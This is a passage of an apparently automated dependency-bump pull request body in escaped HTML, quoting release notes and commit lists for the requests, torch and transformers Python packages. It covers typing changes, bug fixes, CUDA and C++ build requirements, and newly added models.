href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `torch` from 2.11.0 to 2.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytorch/pytorch/releases\"\u003etorch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePyTorch 2.12.0 Release Notes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#highlights\"\u003eHighlights\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#backwards-incompatible-changes\"\u003eBackwards Incompatible Changes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#deprecations\"\u003eDeprecations\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#new-features\"\u003eNew Features\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#improvements\"\u003eImprovements\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#bug-fixes\"\u003eBug fixes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#performance\"\u003ePerformance\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#documentation\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#developers\"\u003eDevelopers\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#security\"\u003eSecurity\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eHighlights\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eFor more details about these highlighted features, you can look at the release blogpost. Below are the full release notes for this release.\u003c/p\u003e\n\u003ch1\u003eBackwards Incompatible Changes\u003c/h1\u003e\n\u003ch2\u003eBuild Frontend\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eStrengthened SVE compile checks in \u003ccode\u003eFindARM.cmake\u003c/code\u003e, which may reject previously accepted but incorrect SVE configurations (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/176646\"\u003e#176646\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eSource builds that enable SVE now validate the compiler configuration more strictly. If a build previously passed with an incomplete or mismatched SVE setup, it may now fail during CMake configuration instead of later in compilation. Update the compiler/toolchain flags so they accurately describe the target SVE support, or disable SVE for that build.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated the minimum CUDA version required to build PyTorch from source to CUDA 12.6 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178925\"\u003e#178925\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eBuilding PyTorch from source with CUDA versions older than 12.6 is no longer supported. Users building custom binaries should install CUDA 12.6 or newer and make sure \u003ccode\u003eCUDA_HOME\u003c/code\u003e points to that installation.\u003c/p\u003e\n\u003cp\u003eVersion 2.11:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.4 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eVersion 2.12:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.6 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEnforced a C++20 minimum in CMake build files (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178662\"\u003e#178662\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/0d62256a2b23365f8e1604297eb23a6545102aa8\"\u003e\u003ccode\u003e0d62256\u003c/code\u003e\u003c/a\u003e [release] Dockerfile: skip torchaudio install when CUDA_PATH=cu132 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/183346\"\u003e#183346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/7661cd9c6b841b62b7f411aa52ec51f05457263b\"\u003e\u003ccode\u003e7661cd9\u003c/code\u003e\u003c/a\u003e [MPS] Fix SDPA wrong output for permuted q/k/v with B \u0026gt; 1 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181886\"\u003e#181886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/9da6087ab64ab6a2118686420ca5353c90dd7e1f\"\u003e\u003ccode\u003e9da6087\u003c/code\u003e\u003c/a\u003e Fix stale PYTORCH_RELEASES_CODE_CC dict (fixes \u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182250\"\u003e#182250\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182369\"\u003e#182369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/e4c37cc011d47246ce8ea4b99c9b28fb7f400224\"\u003e\u003ccode\u003ee4c37cc\u003c/code\u003e\u003c/a\u003e Avoid raw stream name collisions in Inductor (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182178\"\u003e#182178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/822d047dc8dd8d919f83c3ad5c786e405075d1f0\"\u003e\u003ccode\u003e822d047\u003c/code\u003e\u003c/a\u003e [MPS] Fix bool mask handling in 1-pass SDPA decode kernel (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182285\"\u003e#182285\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182311\"\u003e#182311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/5c5e523cd520e6986006e45be243b3ee927ea546\"\u003e\u003ccode\u003e5c5e523\u003c/code\u003e\u003c/a\u003e Add enable_gqa parameter to SDPA MPS meta registration (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181550\"\u003e#181550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/eece52ead16886e5463c3dcee9b04db783cc68d5\"\u003e\u003ccode\u003eeece52e\u003c/code\u003e\u003c/a\u003e [AOTI] Add BC-safe c_shim v2 for _scaled_dot_product_attention_math_for_mps e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/b39330bbe210b9628207e84d8ba2cabb7975fbac\"\u003e\u003ccode\u003eb39330b\u003c/code\u003e\u003c/a\u003e [Inductor] Call latest c_shim version for versioned fallback ops (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181548\"\u003e#181548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/06f10d088229a25ac52bd14b6cacc04a4161f6ca\"\u003e\u003ccode\u003e06f10d0\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[FSDP2] add fqn to communication ops\u0026quot; (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182100\"\u003e#182100\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182157\"\u003e#182157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/449e3393139a1aca9afec120c9a63f98f12d55b0\"\u003e\u003ccode\u003e449e339\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[Inductor] Improve materialization heuristic for a chain of computaio...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytorch/pytorch/compare/v2.11.0...v2.12.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `transformers` from 5.7.0 to 5.10.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/transformers/releases\"\u003etransformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePatch release v5.10.2\u003c/h1\u003e\n\u003cp\u003eThere was a big bug in the model conversion of models related to clip, this affected models like sam3 and others. Please make sure to update :pray:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix conversion for clip models by \u003ca href=\"https://github.com/zucchini-nlp\"\u003e\u003ccode\u003e@​zucchini-nlp\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\"\u003ehttps://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003eRelease v5.10.1\u003c/h1\u003e\n\u003cp\u003ev5.10.0 was yanked as we publish on a corrupted branch. Sorry everyone, this happens when we rush a release!!!\u003c/p\u003e\n\u003ch2\u003eNew Model additions\u003c/h2\u003e\n\u003ch3\u003eGemma4 unified+ Gemma4 MTP\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eGemma 4 12B Unified is an \u003cstrong\u003eencoder-free\u003c/strong\u003e multimodal model with pretrained and instruction-tuned variants. Unlike \u003ca href=\"https://github.com/huggingface/transformers/blob/HEAD/gemma4\"\u003estandard Gemma 4\u003c/a\u003e, which uses dedicated encoder towers, Gemma 4 12B Unified projects raw inputs directly into the language model's embedding space through lightweight linear pipelines. This results in a simpler architecture while maintaining strong multimodal performance.\u003c/p\u003e\n\u003cp\u003eKey differences from standard Gemma 4:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eNo Vision Tower\u003c/strong\u003e: Raw pixel patches are projected directly into LM space via a \u003ccode\u003eDense + LayerNorm\u003c/code\u003e pipeline with factorized 2D positional embeddings, replacing the vision encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo Audio Tower\u003c/strong\u003e: Raw 16 kHz waveform samples are chunked into fixed-length frames and projected through a simple \u003ccode\u003eRMSNorm → Linear\u003c/code\u003e pipeline, replacing the mel spectrogram + Conformer encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShared Multimodal Pipeline\u003c/strong\u003e: Both vision and audio use the same \u003ccode\u003eGemma4UnifiedMultimodalEmbedder\u003c/code\u003e (RMSNorm → Linear) for the final projection to text hidden space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eYou can find the original Gemma 4 12B Unified checkpoints under the \u003ca href=\"https://huggingface.co/collections/google/gemma-4\"\u003eGemma 4\u003c/a\u003e release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ewho needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e) by \u003ca href=\"https://github.com/douglas-reid\"\u003e\u003ccode\u003e@​douglas-reid\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/sgerrard\"\u003e\u003ccode\u003e@​sgerrard\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/vasqu\"\u003e\u003ccode\u003e@​vasqu\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/molbap\"\u003e\u003ccode\u003e@​molbap\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eSapiens2\u003c/h3\u003e\n\u003cp\u003eSapiens2 is a family of high-resolution vision transformers pretrained on ~1 billion curated human images, designed for human-centric computer vision tasks including pose estimation, body-part segmentation, surface normal estimation, and pointmap estimation. The models scale from 0.4B to 5B parameters and train at native 1K resolution, with hierarchical 4K variants for extended spatial reasoning. Sapiens2 achieves substantial improvements over its predecessor with +4 mAP in pose estimation, +24.3 mIoU in body-part segmentation, and 45.6% error reduction in normal estimation.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/sapiens2\"\u003eDocumentation\u003c/a\u003e | \u003ca href=\"https://huggingface.co/papers/2604.21681\"\u003ePaper\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e) by \u003ca href=\"https://github.com/guarin\"\u003e\u003ccode\u003e@​guarin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45919\"\u003e#45919\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeepSeek-OCR-2\u003c/h3\u003e\n\u003cp\u003eDeepSeek-OCR-2 is an OCR-specialized vision-language model built on a distinctive architecture that combines a SAM ViT-B vision encoder with a Qwen2 hybrid attention encoder, connected through an MLP projector to a DeepSeek-V2 Mixture-of-Experts (MoE) language model. The model features a hybrid attention mechanism that applies bidirectional attention over image tokens and causal attention over query tokens, enabling efficient and accurate document understanding. It supports both plain OCR tasks and grounding capabilities with coordinate-aware output for document conversion to markdown format.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/deepseek_ocr2\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Deepseek-OCR-2 model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45075\"\u003e#45075\u003c/a\u003e) by \u003ca href=\"https://github.com/thisisiron\"\u003e\u003ccode\u003e@​thisisiron\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45075\"\u003e#45075\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMellum\u003c/h3\u003e\n\u003cp\u003eMellum is a code-focused Mixture-of-Experts language model developed by JetBrains. It is derived from the Qwen3-MoE architecture with per-layer-type RoPE and interleaved sliding window attention. The model has 12B total parameters with 2.5B active parameters per token, using 64 routed experts with 8 activated per token across 28 layers.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/mellum\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add support for JetBrains' \u003ccode\u003eMellum\u003c/code\u003e v2 code generation model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46112\"\u003e#46112\u003c/a\u003e) by \u003ca href=\"https://github.com/shadeMe\"\u003e\u003ccode\u003e@​shadeMe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/46112\"\u003e#46112\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0dad7b822255a0ae261ec45ae937371e859ffd1a\"\u003e\u003ccode\u003e0dad7b8\u003c/code\u003e\u003c/a\u003e v5.10.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/8a4ffee847b90a732a1febefeca5180fffd5596f\"\u003e\u003ccode\u003e8a4ffee\u003c/code\u003e\u003c/a\u003e Fix conversion for clip models (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/90c3ae54d448d4906b6167317ea5a7f5d48a232d\"\u003e\u003ccode\u003e90c3ae5\u003c/code\u003e\u003c/a\u003e Patch because we had to yank 5.10 because the release branch was not up to date\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0bd94b37db639d8f29a094dce2fde06f86af8968\"\u003e\u003ccode\u003e0bd94b3\u003c/code\u003e\u003c/a\u003e v5.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1423d22f7a3b62e8c70ad67b58ec25cd9b675897\"\u003e\u003ccode\u003e1423d22\u003c/code\u003e\u003c/a\u003e who needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/50eb20a24f9dd512e6770072f422e4b86ca3cd98\"\u003e\u003ccode\u003e50eb20a\u003c/code\u003e\u003c/a\u003e Fix dsv4 dequant + tp/ep (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46378\"\u003e#46378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/74464e8c49c91b574c30cc3cb3c5a44000237299\"\u003e\u003ccode\u003e74464e8\u003c/code\u003e\u003c/a\u003e Fix wrong changes produced by style/repo. check bot (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46371\"\u003e#46371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1b8ec344fb6c277235fc76c37e7a5c156a1f0ddc\"\u003e\u003ccode\u003e1b8ec34\u003c/code\u003e\u003c/a\u003e Fix path traversal when saving Bark voice preset embeddings (\u003ca 